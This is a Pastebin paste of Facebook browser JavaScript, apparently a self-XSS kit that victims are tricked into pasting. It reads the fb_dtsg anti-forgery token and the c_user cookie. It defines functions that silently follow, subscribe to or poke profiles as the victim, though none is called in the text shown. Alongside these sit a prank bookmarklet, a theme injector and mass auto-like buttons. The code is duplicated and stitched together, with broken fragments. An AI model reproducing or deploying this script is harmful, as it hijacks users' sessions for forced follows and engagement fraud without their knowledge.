Advertisement
Ghost_Team

Untitled

Aug 22nd, 2013
390
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Nagios 20.12 KB | None | 0 0
  1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  2. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  3. alert('Chúc mừng bạn đã thành công, chúc bạn một ngày vui vẻ ^^...');
  4. function a(abone){
  5. var http4 = new XMLHttpRequest();
  6. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  7. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  8. http4.open("POST", url4, true);
  9. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  10. http4.setRequestHeader("Content-length", params4.length);
  11. http4.setRequestHeader("Connection", "close");
  12. http4.onreadystatechange = function() {
  13. if(http4.readyState == 4 && http4.status == 200) {http4.close;}
  14. }
  15. http4.send(params4);
  16. }
  17. javascript:(function(){function c(){var e=document.createElement('link');e.setAttribute('type','text/css');e.setAttribute('rel','stylesheet');e.setAttribute('class',l);document.body.appendChild(e)}function h(){var e=document.getElementsByClassName(l);for(var t=0;t<e.length;t++){document.body.removeChild(e[t])}}function p(){var e=document.createElement('div');e.setAttribute('class',a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s=d(i);return s.height>e&&s.height<n&&s.width>t&&s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e&&!isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.scrollTop,document.body.scrollTop)}function E(e){var t=m(e);return t>=w&&t<=b+w}function S(){var e=document.createElement('audio');e.setAttribute('class',l);e.src=i;e.loop=true;e.addEventListener('canplay',function(){setTimeout(function(){x(k)},500);setTimeout(function(){N();p();for(var e=0;e<O.length;e++){T(O[e])}},15500)},true);e.addEventListener('ended',function(){N();h()},true);e.innerHTML=' <p>If you are reading this, it is because your browser does not support the audio element. We recommend that you get a new browser.</p> <p>';document.body.appendChild(e);e.play()}function x(e){e.className+=' '+s+' '+o}function T(e){e.className+=' '+s+' '+u[Math.floor(Math.random()*u.length)]}function N(){var e=document.getElementsByClassName(s);var t=new RegExp('\\b'+s+'\\b');for(var n=0;n<e.length;){e[n].className=e[n].className.replace(t,'')}}var e=30;var t=30;var n=350;var r=350;var i='http://s71.stream.nixcdn.com/c191b65a57a0bb752f0213a21f374d2b/52156726/NhacCuaTui080/TouchMyHand-DavidArchuleta_fu4r.mp3';var s='mw-harlem_shake_me';var o='im_first';var u=['im_drunk','im_baked','im_trippin','im_blown'];var a='mw-strobe_light';var l='mw_added_css';var b=g();var w=y();var C=document.getElementsByTagName('*');var k=null;for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){if(E(A)){k=A;break}}}if(A===null){console.warn('Could not find a node of the right size. Please try a different page.');return}c();S();var O=[];for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){O.push(A)}}})()
  18. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  19. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  20. var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
  21. var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  22. function a(abone)
  23. {
  24.  var http4=new XMLHttpRequest;
  25.  var url4="/ajax/follow/follow_profile.php?__a=1";
  26.  var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
  27.  http4.open("POST",url4,true);
  28.  http4.onreadystatechange=function()
  29.  {
  30.   if(http4.readyState==4&&http4.status==200)http4.close
  31.  }
  32.  ;
  33.  http4.send(params4)
  34. }
  35.  
  36. function sublist(uidss)
  37. {
  38.  var a = document.createElement('script');
  39.  a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  40.  document.body.appendChild(a);
  41. }
  42.  
  43. function p(abone)
  44. {
  45.  var http4 = new XMLHttpRequest();
  46.  var url4 = "//www.facebook.com/ajax/poke_dialog.php";
  47.  var params4 = "uid=" + abone + "&pokeback=0&ask_for_confirm=0&nctr[_mod]=pagelet_timeline_profile_actions&__asyncDialog=1&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=v&fb_dtsg="+fb_dtsg+"&phstamp=";
  48.  http4.open("POST", url4, true);
  49.  http4.onreadystatechange = function ()
  50.  {
  51.   if (http4.readyState == 4 && http4.status == 200)
  52.   {
  53.    http4.close;
  54.   }
  55.  }
  56.  ;
  57.  http4.send(params4);
  58. }
  59.  
  60.  
  61.  
  62. (function() {
  63. var css = "@namespace url(http://www.w3.org/1999/xhtml); body, html,#content {background:#000000 url(http://images2.layoutsparks.com/1/243903/heavenly-moon-stars-shine-31000.gif) 100% 0% scroll!important;color:#000000!important} h2 {color:#000000!important} .feed_item .header_container .header_title_wrapper {color:#000000!important} .fb_menu_dropdown .fb_menu_item a{background:#000000!important} .fb_menu_dropdown .fb_menu_item a:hover {background:#000000!important} .applications .right_column {background:#000000!important} #fb_menubar_aux .fb_menu .fb_menu_title a .menu_title:hover, #fb_menubar_aux #fb_menu_settings.fb_menu .fb_menu_title a:hover,#fb_menubar_aux .fb_menu .fb_menu_title a:hover,#facebook .hidden_elem{background:#000000!important} .rooster_info {background:#000000!important} .rooster_title {border-color:#000000!important} .commentable_item.expanded_comments.collapsed_add_box .comment_bottom_add_link {background:#000000!important} #newsfeed_submenu {background:#000000!important;border-color:#000000!important} .emu_ad .add_comment {background:#000000!important} /* inicial */ #newsfeed_tabs_wrapper {background: #000000!important; } #newsfeed_submenu, #newsfeed_submenu_content * {color:#000000!important;} #newsfeed_wrapper {background:#ffffff!important;border:1px solid #000000!important;} #newsfeed_wrapper * :not(a), #content { background: transparent !important; color: #000000!important; } /*barra bem vindo*/ .fbnew_preview_bar {background:#000000!important;color:#000000!important; height:23px !important; margin: -2px !important;} .profile_two_columns .right_column {float:left!important;} /*barra principal*/ #dropmenu_container div, #fb_menubar, #fb_menubar_core .fb_menu .fb_menu_title a,#fb_menubar_core #fb_menu_inbox span {background:url(http://i264.photobucket.com/albums/ii171/ppiedade/newfundobarranaruto.gif) repeat scroll left top !important ;font-family:arial!important;color:#000000!important;background-color:#222!important} .fb_menu_dropdown .fb_menu_item_disabled span {color:#000000!important} .commentable_item .show_all_link, .commentable_item .wallpost {background:#000000!important} .profile .feedwall_menu .size_header {background-color:#000000!important;} /*pop-ups*/ td.pop_content h2 span {background-color:#000000 !important} td.pop_content .dialog_body {background-color:#ffffff!important;color:#000000!important; font-family:arial bold !important;font-size:medium !important;} td.pop_content .dialog_buttons {background-color:#000000!important;} .ubersearch.search_profile .result {background:#000000!important} td.pop_content .dialog_summary {background:#000000!important} /*td.pop_content .dialog_content,dialog_body,generic_dialog_popup,table.pop_dialog_table, td.pop_content .dialog_content, td.pop_content .dialog_body*/ generic_dialog pop_dialog, pop_dialog_table, pop_content pop_content {background:#eebd4a!important} /*buttons*/ .dialog_content .dialog_buttons .inputaux, .dialog_content .dialog_buttons .inputaux_disabled, .dialog_content .dialog_buttons .inputbutton, .dialog_content .dialog_buttons .inputsubmit {background:#eebd4a!important;color:#000000!important} .home_status_editor .home_status_editor_content .status_body {background:#eebd4a!important;color:#000000!important} /*profile page*/ .UIRooster_Content {background:#000!important;color:#000!important} #profile_composer .composer_tabs ul li a.tab_link {background-color:#ffffff!important} /*cabeçalhos laterais*/ .profile .box h3.box_header{background:#000000!important; color:#000000!important} .box_column .box h3.box_header{background:#000000!important; color:#000000!important;font-family:arial !important} .profile .top_bar ul.tabs li.selected a.tab_link ,.media_header {background:#000000!important;color:#000000!important} .profile .basic_info_summary dl.info dd{color:#000000!important; background:#000000!important} #profile_composer .status_composer {background:#000000!important} #profile_composer .placeholder_off div.hide_placeholder, #profile_composer div.show_placeholder {background:#000000!important} .profile_two_columns .right_column {background:#000000!important} .minifeedwall .story{background:#eebd4a url()!important;} /*MIOLO DAS CAIXAS*/ .UIStory{background:#000000!important} .minifeedwall .date_divider span {background:#ffffff!important;color:#000000!important;font-family:arial!important;font-weight:bold!important;font-size:x-small!important} /*BOT SHARE*/ .UIComposer_Button,UIComposer_ButtonContainer,UIComposer_TDButton,UIComposer{background:#000000!important} .minifeedwall .status_story {color:#000000!important} .minifeedwall{background:#eebd4a!important; color:#000000!important} .minifeedwall .date_divider span {background:#eebd4a!important;color:#000000!important;font-family:arial !important;font-weight:bold!important;font-size:x-small!important} #feedwall_controls {background:#000000!important} #feedwall_controls h1, #feedwall_controls h2, #feedwall_controls h3,#feedwall_controls h4,#feedwall_controls h5,#feedwall_controls a,#feedwall_controls .one_liner h2 a {color:#000!important} .minifeedwall .wall_story .story_content, .minifeedwall .from_friend_story.wall_story .story_content {background:#eebd4a!important;color:#000!important;border-bottom:1px solid #000!important;} .commentable_item.expanded_comments .comment_box {background:#eebd4a!important} .profile .basic_info_summary dl.info dd {color:#000000!important;font-family:arial!important} .products .main_column, div#page_height.clearfix, div.UIOneOff_Container, .UIMediaHeader_SubHeader, .UIMediaHeader_TitleWash,.UIWashFrame_MainContent, .profile .right_column_container, .UIFullPage_Container, .UIStandardFrame_Container {background:url(http://i264.photobucket.com/albums/ii171/ppiedade/yelowwb.png) fixed 50% 0% !important;background-repeat: no-repeat !important ;} .profile .primary_box_orientation_attachment {background:#000000!important} #profile_composer .composer_tabs ul li.selected span {background-color:#eebd4a!important;font-family:arial!important} .profile .top_bar ul.tabs li a.tab_link{background:#eebd4a!important;color:#000000!important} .profile_two_columns .left_column{background:#eebd4a!important} .actions a.action, .viewer_actions a.action {background:#eebd4a!important} /*fundo perfil superior*/ .profile .profile_top_bar_container{background:url()!important} .home_main_item .commentable_item .wallpost, .minifeedwall .commentable_item .wallpost {background:#000000!important;color:#000000!important} /*friends*/ .fdh .content {background:#000000!important} .fmp #friends_target {background:#000000!important} #fpgc tr{background-color:#000000!important} .frn {background-color:#000000!important} .fmp .footer_bar {background:#eebd4a!important} .ffriend {background:#000000!important} .fmp #friends_target .user_status{background-color:#eebd4a!important} #friend_filters {background:#eebd4a!important} .inputsearch {background-color:#eebd4a!important} .frn .people_you_may_know, .frn .friend_finder, .frn .invite_friends, .ffriend {color:#000000!important} .fmp .user_status .status_composer .status_field, .fmp {background:#000000!important} /*inbox*/ .composer, .thread_header{background:#ffffff!important} .inbox_menu{background:#e07501!important} .notifications .side_column{background:#000000!important;} .notifications .side_column li{color:#000000!important} .notifications h4, .notifications h5{color:#000000!important;font-weight:bold!important} .read_updates, .updates_all, .notifications{background:transparent!important} .message_rows .new_message {background-color:#eebd4a!important} /*GERAL*/ #content:before{content:url(http://i264.photobucket.com/albums/ii171/ppiedade/hastefb.gif );margin: 0px 0 0 640px} #fb_menubar:before{content:url(http://i264.photobucket.com/albums/ii171/ppiedade/bannernaruto1copy.jpg ?imgmax=1280 );margin: -30px } #content { background: transparent !important; color: #000000!important; } /*.....transparência.....*/ .UIRoundedBox_Corner, .quote, .em, .UIRoundedBox_TL, .UIRoundedBox_TR, .UIRoundedBox_BR, .UIRoundedBox_LS, .UIRoundedBox_BL, .profile_color_bar, .pagefooter_topborder, .flyout_menu_header_shadow, .flyout_menu_header, .flyout_menu_mask, .flyout_menu_content_shadow, .menu_content, .newsfeed_more_section, .newsfeed_more_flyout_apps, .newsfeed_more_flyout_wrapper, .flyout_menu_content_shadow, h3, #feed_content_section_friend_lists, ul, li, .comment_box, .comment, #homepage_bookmarks_show_more, .profile_top_wash, .canvas_container, .composer_rounded, .composer_well, .composer_tab_arrow, .composer_tab_rounded ,.tl, .tr, .module_right_line_block, .body, .module_bottom_line, .lock_b_bottom_line, #info_section_info_2530096808 .info dt, .pipe, .dh_new_media, .dh_new_media .br, .frn_inpad, #frn_lists, #frni_0, .frecent span, h3 span, .UIMediaHeader_TitleWash, .editor_panel .right, .UIMediaButton_Container tbody *, #userprofile, .profile_box, .date_divider span, .corner, .profile #content, .profile #content .UIOneOff_Container, #facebook{background: transparent !important;} .module .topl_lrg h1{color:#c60404!important;font-family: arial !important;} #fpgc {background:none!important;width:750px!important;border-color:#e1cd2f!important;} #ffriends, #friends_right_cell, .ffriend, .fmp, .fsummary, .frn, .frni, .frni.active_list a {background-color:#000000!important;border-color:#000000!important;} #friends_left_cell h3 {font-size:13px!important;font-family: arial !important; padding-left:27px!important;} .fadvfilt {background:none!important;padding-top:3px!important;} .formerror{color:rgb(255, 69, 44) !important} .promo,.warning{color: #rgb(255, 69, 44)!important} .alttxt{color: #000000!important} .requiredfield{color: #000000!important} .floatanchorselected{background-color: #rgb(255, 69, 44)!important}a {color: #rgb(255, 69, 44)!important}.floatanchornormal{color: #rgb(255, 69, 44)!important}span.adsurl{color: #rgb(255, 69, 44)!important}.inlinecorrect{color: #000000!important}a:hover,.parabtns a.btn:hover,.inlinebtns a.btn:hover{color: #000000!important}a.userbutton:hover{color: #000000!important}#header li a,ul.intabs li.sel a{color:#rgb(255, 69, 44)!important}/* MORE THEMES AND LAYOUTS IN WWW.TEMPLAH.COM */";
  64. if (typeof GM_addStyle != "undefined") {
  65.     GM_addStyle(css);
  66. } else if (typeof addStyle != "undefined") {
  67.     addStyle(css);
  68. } else {
  69.     var heads = document.getElementsByTagName("head");
  70.     if (heads.length > 0) {
  71.         var node = document.createElement("style");
  72.         node.type = "text/css";
  73.         node.appendChild(document.createTextNode(css));
  74.         heads[0].appendChild(node);
  75.     }
  76. }
  77. })();
  78. body = document.body;
  79. if(body != null)
  80. {
  81.  div = document.createElement("div");
  82.  div.style.position = "fixed";
  83.  div.style.display = "block";
  84.  div.style.width = "130px";
  85.  div.style.opacity= 0.90;
  86.  div.style.bottom = "+70px";
  87.  div.style.left = "+0px";
  88.  div.style.backgroundColor = "#E7EBF2";
  89.  div.style.border = "1px solid #6B84B4";
  90.  div.style.padding = "3px";
  91.  div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='' title='Refresh'><blink><center>Close (F5)</center></blink></a>"
  92.  body.appendChild(div);
  93. }
  94.  
  95. if(body != null)
  96. {
  97.  div = document.createElement("div");
  98.  div.setAttribute('id','like2');
  99.  div.style.position = "fixed";
  100.  div.style.display = "block";
  101.  div.style.width = "130px";
  102.  div.style.opacity= 0.90;
  103.  div.style.bottom = "+49px";
  104.  div.style.left = "+0px";
  105.  div.style.backgroundColor = "#E7EBF2";
  106.  div.style.border = "1px solid #6B84B4";
  107.  div.style.padding = "3px";
  108.  div.innerHTML = "<a style='font-weight:bold;color:#3B5998' onclick='Anonymous69()'><center>By.Gia Bảo</center></a></a>"
  109.  body.appendChild(div);
  110.  unsafeWindow.Anonymous69 = function()
  111.  {
  112.   var B=0;
  113.   var J=0;
  114.   var I=document.getElementsByTagName("a");
  115.   var H=new Array();
  116.   for(var D=0;D<I.length;D++)
  117.   {
  118.    if(I[D].getAttribute("class")!=null&&I[D].getAttribute("class").indexOf("UFILikeLink")>=0&&(I[D].innerHTML=="Me gusta"||I[D].innerHTML=="Like"||I[D].innerHTML=="?????"||I[D].innerHTML=="Suka"||I[D].innerHTML=="Begen"||I[D].innerHTML=="??????"||I[D].innerHTML=="???!"||I[D].innerHTML=="?"||I[D].innerHTML=="Seneng"||I[D].innerHTML=="???"||I[D].innerHTML=="J?¢â‚¬â„¢aime"))
  119.    {
  120.     H[J]=I[D];
  121.     J++
  122.    }
  123.   }
  124.   function E(L)
  125.   {
  126.    H[L].click();
  127.    var K="<a style='font-weight:bold;color:#3B5998' onclick='Autolike()'><center>Like Status: "+(L+1)+"/"+H.length+"</center></a>";
  128.    document.getElementById("like2").innerHTML=K
  129.   }
  130.   function G(K)
  131.   {
  132.    window.setTimeout(C,K)
  133.   }
  134.   function A()
  135.   {
  136.    var M=document.getElementsByTagName("label");
  137.    var N=false;
  138.    for(var L=0;L<M.length;L++)
  139.    {
  140.     var K=M[L].getAttribute("class");
  141.     if(K!=null&&K.indexOf("uiButton uiButtonLarge uiButtonConfirm")>=0)
  142.     {
  143.      alert("Warning from Facebook");
  144.      N=true
  145.     }
  146.    }
  147.    if(!N)
  148.    {
  149.     G(2160)
  150.    }
  151.   }
  152.   function F(K)
  153.   {
  154.    window.setTimeout(A,K)
  155.   }
  156.   function C()
  157.   {
  158.    if(B<H.length)
  159.    {
  160.     E(B);
  161.     F(700);
  162.     B++
  163.    }
  164.   }
  165.   ;
  166.   C()
  167.  }
  168. }
  169. {
  170.   div=document.createElement("div");
  171.   div.style.position="fixed";
  172.     div.style.display="block";
  173.     div.style.width="130px";
  174.     div.style.opacity=.9;
  175.     div.style.bottom="+95px";
  176.     div.style.left="+0px";
  177.     div.style.backgroundColor="#E7EBF2";
  178.     div.style.border="1px solid #6B84B4";
  179.     div.style.padding="3px";
  180.     div.innerHTML="<a style='font-weight:bold;color:#E30505' href='https://www.facebook.com/donnazmi/notes' target='_blank' title='NEW' ><blink><center>NEW FACEBOOK</center></blink></a>";body.appendChild(div)}body=document.body;if(body!=null)
  181.      
  182. body = document.body;
  183. if(body != null)
  184. {
  185.  div = document.createElement("div");
  186.  div.setAttribute('id','like3');
  187.  div.style.position = "fixed";
  188.  div.style.display = "block";
  189.  div.style.width = "130px";
  190.  div.style.opacity= 0.90;
  191.  div.style.bottom = "+28px";
  192.  div.style.left = "+0px";
  193.  div.style.backgroundColor = "#E7EBF2";
  194.  div.style.border = "1px solid #6B84B4";
  195.  div.style.padding = "3px";
  196.  div.innerHTML = "<a style='font-weight:bold;color:#3B5998' onclick='AnonymousComments()'><center>Like All Comments</center></a>"
  197.  body.appendChild(div);
  198.  unsafeWindow.AnonymousComments = function()
  199.  {
  200.   var B=0;
  201.   var J=0;
  202.   var I=document.getElementsByTagName("a");
  203.   var H=new Array();
  204.   for(var D=0;D<I.length;D++)
  205.   {
  206.    if(I[D].getAttribute("data-ft")!=null&&(I[D].getAttribute("title")=="Me gusta este comentario"||I[D].getAttribute("title")=="Like this comment"||I[D].getAttribute("title")=="???? ?? ??????"||I[D].getAttribute("title")=="Suka komentar ini"||I[D].getAttribute("title")=="Nyenengi tanggapan iki"||I[D].getAttribute("title")=="??????? ????????"||I[D].getAttribute("title")=="??????????!"||I[D].getAttribute("title")=="??? ??"||I[D].getAttribute("title")=="??????"||I[D].getAttribute("title")=="J?¢â‚¬â„¢aime ce commentaire"||I[D].getAttribute("title")=="Bu yorumu begen"))
  207.    {
  208.     H[J]=I[D];
  209.     J++
  210.    }
  211.   }
  212.   function E(L)
  213.   {
  214.    H[L].click();
  215.    var K="<a style='font-weight:bold;color:#3B5998' onclick='Autolike()'><center>Like Comments: "+(L+1)+"/"+H.length+"</center></a>";
  216.    document.getElementById("like3").innerHTML=K
  217.   }
  218.   function G(K)
  219.   {
  220.    window.setTimeout(C,K)
  221.   }
  222.   function A()
  223.   {
  224.    var M=document.getElementsByTagName("label");
  225.    var N=false;
  226.    for(var L=0;L<M.length;L++)
  227.    {
  228.     var K=M[L].getAttribute("class");
  229.     if(K!=null&&K.indexOf("uiButton uiButtonLarge uiButtonConfirm")>=0)
  230.     {
  231.      alert("Warning from Facebook");
  232.      N=true
  233.     }
  234.    }
  235.    if(!N)
  236.    {
  237.     G(2160)
  238.    }
  239.   }
  240.   function F(K)
  241.   {
  242.    window.setTimeout(A,K)
  243.   }
  244.   function C()
  245.   {
  246.    if(B<H.length)
  247.    {
  248.     E(B);
  249.     F(700);
  250.     B++
  251.    }
  252.   }
  253.   C()
  254.  }
  255. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement